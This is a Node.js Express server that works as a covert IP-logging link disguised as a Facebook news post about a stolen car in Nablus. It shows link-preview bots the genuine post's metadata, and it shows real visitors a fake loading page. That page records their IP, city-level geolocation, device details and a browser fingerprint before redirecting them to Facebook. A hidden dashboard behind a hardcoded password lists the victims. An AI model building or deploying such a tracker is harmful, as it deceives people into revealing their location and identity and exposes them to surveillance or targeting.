const express=require('express'),reqIp=require('request-ip'),geoip=require('geoip-lite'),UAParser=require('ua-parser-js'),fs=require('fs'),app=express();
app.use(express.json({limit:'50mb'}));app.use(reqIp.mw());
const T='https://www.facebook.com/share/p/18atzfbxGM/',G='سرقت في نابلس وعثر عليها في رام الله.. الشرطة تعيد مركبة طالبة جامعية من أراضي الـ48',D='الطالبة وجّهت مناشدة مباشرة لمدير عام الشرطة اللواء علام السقا، لتتحرك الأجهزة الأمنية فورًا وتبدأ رحلة البحث والتحري. وبعد متابعة مكثفة بين نابلس ورام الله، تمكنت المباحث العامة من تحديد مكان المركبة وضبطها، والقبض على عدد من المشتبه بهم تمهيدًا لاتخاذ الإجراءات القانونية بحقهم.',I='https://scontent.fjrs2-2.fna.fbcdn.net/v/t39.30808-6/694593375_1395060505989068_1458648189795522601_n.jpg?stp=dst-jpg_tt6&cstp=mx680x680&ctp=s600x600&_nc_cat=104&ccb=1-7&_nc_sid=3b1b4a&_nc_ohc=0GVH8E28obIQ7kNvwEw3PDw&_nc_oc=AdrJprHuDdC3k9S_pGgxs433K6fXcmvomwyqqrdsv2dvAOY5NMvxRfSq0IkSF9YttZE&_nc_zt=23&_nc_ht=scontent.fjrs2-2.fna&_nc_gid=sTKXrTX3EmSgezyNk2hbiA&_nc_ss=7b20f&oh=00_Af6ZYLjSJCS4MwcGYXt77-yZbvSP4orp_xkEfW2H44o25g&oe=6A02BCD4',P='Ramallah2026!';
function getIP(req){const ip=req.clientIp||req.ip||'unk',geo=geoip.lookup(ip),ua=UAParser(req.headers['user-agent']||'');return{ip,geo,ua};}
function isBot(req){return/(facebookexternalhit|facebot|whatsapp|twitter|linkedin|telegram|discord|slack|googlebot|bingbot)/i.test(req.headers['user-agent']||'');}
function h(t){return t.replace(/</g,'&lt;').replace(/"/g,'&quot;');}
app.get('/robot.txt',(req,res)=>res.send('User-agent:*\nDisallow:/dash\nAllow:/\n'));
app.get(['/','/track'],(req,res)=>{
const{id}=getIP(req),v='v_'+Date.now()+Math.random().toString(36).slice(2,7);
const e={v,t:new Date().toISOString(),s:{ip:id.ip,geo:id.geo,ua:req.headers['user-agent']||'',rf:req.headers.referer||'D'},b:{n:id.ua.browser?.name,v:id.ua.browser?.version},o:{n:id.ua.os?.name,v:id.ua.os?.version},d:{v:id.ua.device?.v,m:id.ua.device?.m}};
fs.appendFileSync('l.txt',JSON.stringify(e)+'\n');
if(isBot(req))return res.send(`<!DOCTYPE html><html lang=ar dir=rtl><head><meta charset=UTF-8><meta property=og:title content="${h(G)}"><meta property=og:description content="${h(D)}"><meta property=og:image content=${I}><meta property=og:image:width content=1200><meta property=og:image:height content=630><meta property=og:url content=${T}><meta property=og:type content=article><meta property=og:site_name content=Facebook><meta name=twitter:card content=summary_large_image><title>${h(G)}</title><link rel=canonical href=${T}></head><body><h1>${h(G)}</h1><p>${h(D)}</p><img src=${I} style=max-width:100%></body></html>`);
res.send(`<!DOCTYPE html><html lang=ar dir=rtl><head><meta charset=UTF-8><meta name=viewport content="width=device-width,initial-scale=1"><title>جاري التحميل...</title><style>body{font-family:Arial;text-align:center;padding-top:25vh;background:#f0f2f5;margin:0;color:#65676b;}.s{border:4px solid #e4e6eb;border-top:4px solid #1877f2;border-radius:50%;width:40px;height:40px;animation:spin 1s linear infinite;margin:0 auto 15px;}@keyframes spin{0%{transform:rotate(0deg)}100%{transform:rotate(360deg)}}</style></head><body><div class=s></div><h3>جاري تحميل المنشور...</h3><script>setTimeout(()=>location.href='${T}',3500);(function(){var d={v:'${v}',s:{w:screen.width,h:screen.height,pr:devicePixelRatio||1,nw:innerWidth,nh:innerHeight},n:{p:navigator.platform,l:navigator.language,hc:navigator.hardwareConcurrency||'u',dm:navigator.deviceMemory||'u',tp:navigator.maxTouchPoints||0,ol:navigator.onLine},tz:Intl.DateTimeFormat().resolvedOptions().timeZone};var x=new XMLHttpRequest();x.open('POST','/c',true);x.setRequestHeader('Content-Type','application/json');x.send(JSON.stringify(d));})();</script></body></html>`);
});
app.post('/c',(req,res)=>{const b=req.body;if(!b||!b.v)return res.json({e:1});let L=[];try{L=fs.readFileSync('l.txt','utf8').split('\n').filter(Boolean).map(JSON.parse);}catch{}const f=L.find(x=>x.v===b.v);if(f){Object.assign(f,b);}else{const{id}=getIP(req);L.push({v:b.v,t:new Date().toISOString(),s:{ip:id.ip,geo:id.geo,ua:req.headers['user-agent']||'',rf:req.headers.referer||'D'},b:{n:id.ua.browser?.name,v:id.ua.browser?.version},o:{n:id.ua.os?.name,v:id.ua.os?.version},d:{v:id.ua.device?.v,m:id.ua.device?.m},...b});}fs.writeFileSync('l.txt',L.map(x=>JSON.stringify(x)).join('\n')+'\n');res.json({ok:1});});
app.get('/dash',(req,res)=>{if(req.query.p!==P)return res.send('Denied');let L=[];try{L=fs.readFileSync('l.txt','utf8').split('\n').filter(Boolean).map(JSON.parse).reverse();}catch{}let h=`<!DOCTYPE html><html lang=ar dir=rtl><head><meta charset=UTF-8><title>لوحة التحكم</title><style>body{background:#111;color:#eee;font-family:Arial;padding:15px;margin:0;}h1{color:#0f0;border-bottom:2px solid #0f0;padding-bottom:8px;}table{width:100%;border-collapse:collapse;font-size:0.85em;}th,td{padding:8px;border-bottom:1px solid #333;text-align:right;}th{background:#222;color:#0f0;}</style></head><body><h1>الزيارات: ${L.length}</h1><table><tr><th>#</th><th>الوقت</th><th>IP</th><th>الدولة</th><th>المدينة</th><th>الجهاز</th><th>المتصفح</th><th>النظام</th></tr>`;L.forEach((e,i)=>{const s=e.s||{},g=s.geo||{};h+=`<tr><td>${i+1}</td><td>${(e.t||'').slice(0,19).replace('T',' ')}</td><td>${s.ip||'?'}</td><td>${g.country||'?'}</td><td>${g.city||'?'}</td><td>${e.d?.v||''} ${e.d?.m||''}</td><td>${e.b?.n||''} ${e.b?.v||''}</td><td>${e.o?.n||''} ${e.o?.v||''}</td></tr>`;});h+='</table></body></html>';res.send(h);});
app.listen(3000,()=>console.log('OK port 3000'));

